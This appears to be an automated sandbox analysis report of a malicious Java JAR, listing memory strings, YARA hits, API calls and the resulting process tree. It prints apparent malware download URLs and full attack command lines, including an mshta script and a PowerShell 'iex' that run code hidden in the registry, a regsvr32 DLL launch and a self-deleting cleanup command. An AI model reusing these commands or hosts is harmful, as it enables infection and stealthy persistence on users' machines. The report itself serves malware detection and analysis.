Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0 |
Source: java.exe, 00000002.00000002.686346145.0000000009BC5000.00000004.00000001.sdmp |
String found in binary or memory: http://bugreport.sun.com/bugreport/ |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.org |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.orgk |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.org |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.orgK |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.chambersign.org/chambersroot.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.securetrust.com/STCA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.securetrust.com/STCA.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# |
Source: regsvr32.exe, 00000006.00000003.788708194.0000000002E9C000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/ |
Source: regsvr32.exe, 00000006.00000003.788671211.0000000002E92000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX |
Source: regsvr32.exe, 00000006.00000003.770611799.0000000002EA8000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94o |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: java.exe, 00000002.00000002.686399629.0000000009BD5000.00000004.00000001.sdmp |
String found in binary or memory: http://java.oracle.com/ |
Source: java.exe, 00000002.00000002.692030098.000000001535C000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp, java.exe, 00000002.00000003.676737804.0000000014BE0000.00000004.00000001.sdmp |
String found in binary or memory: http://null.oracle.com/ |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.comodoca.com |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.sectigo.com |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.sectigo.com0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://policy.camerfirma.com |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://policy.camerfirma.com0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/07 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/; |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.org |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.orgC |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://repository.swisssign.com/ |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://repository.swisssign.com/0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class2.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class2.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class3P.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.chambersign.org |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.chambersign.org1 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadis.bm |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadis.bm0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadisglobal.com/cps |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadisglobal.com/cps0 |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.c.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.c.lencr.org/0 |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/k |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: https://data.green-iraq.com/app.dll |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: https://ocsp.quovadisoffshore.com |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: https://sectigo.com/CPS |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: https://sectigo.com/CPS0 |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04801ADF GetProcAddress,NtCreateSection,memset, |
6_2_04801ADF |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_048025E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
6_2_048025E5 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04804F6E NtMapViewOfSection, |
6_2_04804F6E |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04808055 NtQueryVirtualMemory, |
6_2_04808055 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F25B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
6_2_059F25B9 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
6_2_059E51A4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
6_2_059E4D10 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059E790F |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
6_2_059D68EE |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D3C5B NtCreateSection,memset, |
6_2_059D3C5B |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
6_2_059F33A6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DCBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059DCBA7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
6_2_059D4F72 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EA680 NtMapViewOfSection, |
6_2_059EA680 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
6_2_059F0A00 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E6A33 NtQueryInformationProcess, |
6_2_059E6A33 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059EAD9A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
6_2_059E09C7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D8936 memset,NtQueryInformationProcess, |
6_2_059D8936 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EE543 NtGetContextThread,RtlNtStatusToDosError, |
6_2_059EE543 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
6_2_059D349A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F03BD NtQuerySystemInformation,RtlNtStatusToDosError, |
6_2_059F03BD |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
6_2_059F133A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
6_2_059DC240 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A275AC NtReadVirtualMemory, |
23_2_00A275AC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A379DC NtQueryInformationToken,NtQueryInformationToken,NtClose, |
23_2_00A379DC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3991C NtWriteVirtualMemory, |
23_2_00A3991C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1C29C NtQueryInformationProcess, |
23_2_00A1C29C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A266D4 NtSetInformationProcess,CreateRemoteThread, |
23_2_00A266D4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A4F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
23_2_00A4F002 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Code function: 2_3_1535CC3A |
2_3_1535CC3A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04806680 |
6_2_04806680 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04807E30 |
6_2_04807E30 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_0480175B |
6_2_0480175B |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EED58 |
6_2_059EED58 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D98A0 |
6_2_059D98A0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DD8E5 |
6_2_059DD8E5 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D2F9C |
6_2_059D2F9C |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E0F82 |
6_2_059E0F82 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EDE9A |
6_2_059EDE9A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DB2A4 |
6_2_059DB2A4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DEAFA |
6_2_059DEAFA |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3832C |
23_2_00A3832C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A15080 |
23_2_00A15080 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A130FC |
23_2_00A130FC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A190FC |
23_2_00A190FC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1A8C4 |
23_2_00A1A8C4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A19CD0 |
23_2_00A19CD0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A258DC |
23_2_00A258DC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A25C24 |
23_2_00A25C24 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A15814 |
23_2_00A15814 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A11C78 |
23_2_00A11C78 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2F598 |
23_2_00A2F598 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A125E8 |
23_2_00A125E8 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A275F8 |
23_2_00A275F8 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A35110 |
23_2_00A35110 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1ED6C |
23_2_00A1ED6C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2CD6C |
23_2_00A2CD6C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A30D44 |
23_2_00A30D44 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A17D48 |
23_2_00A17D48 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3A280 |
23_2_00A3A280 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1FEE4 |
23_2_00A1FEE4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A20EF4 |
23_2_00A20EF4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3CAF4 |
23_2_00A3CAF4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A146C0 |
23_2_00A146C0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A36E34 |
23_2_00A36E34 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A35E3C |
23_2_00A35E3C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A25210 |
23_2_00A25210 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A36268 |
23_2_00A36268 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1624C |
23_2_00A1624C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A18254 |
23_2_00A18254 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2625C |
23_2_00A2625C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1C3B4 |
23_2_00A1C3B4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1BB94 |
23_2_00A1BB94 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A23BE0 |
23_2_00A23BE0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A13B24 |
23_2_00A13B24 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2AF34 |
23_2_00A2AF34 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A27F68 |
23_2_00A27F68 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2EF74 |
23_2_00A2EF74 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3BB54 |
23_2_00A3BB54 |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'' >> C:\cmdlinestart.log 2>&1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar' |
|
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M |
|
Source: C:\Windows\SysWOW64\icacls.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Uxax='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uxax).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline' |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline' |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP' |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll' |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
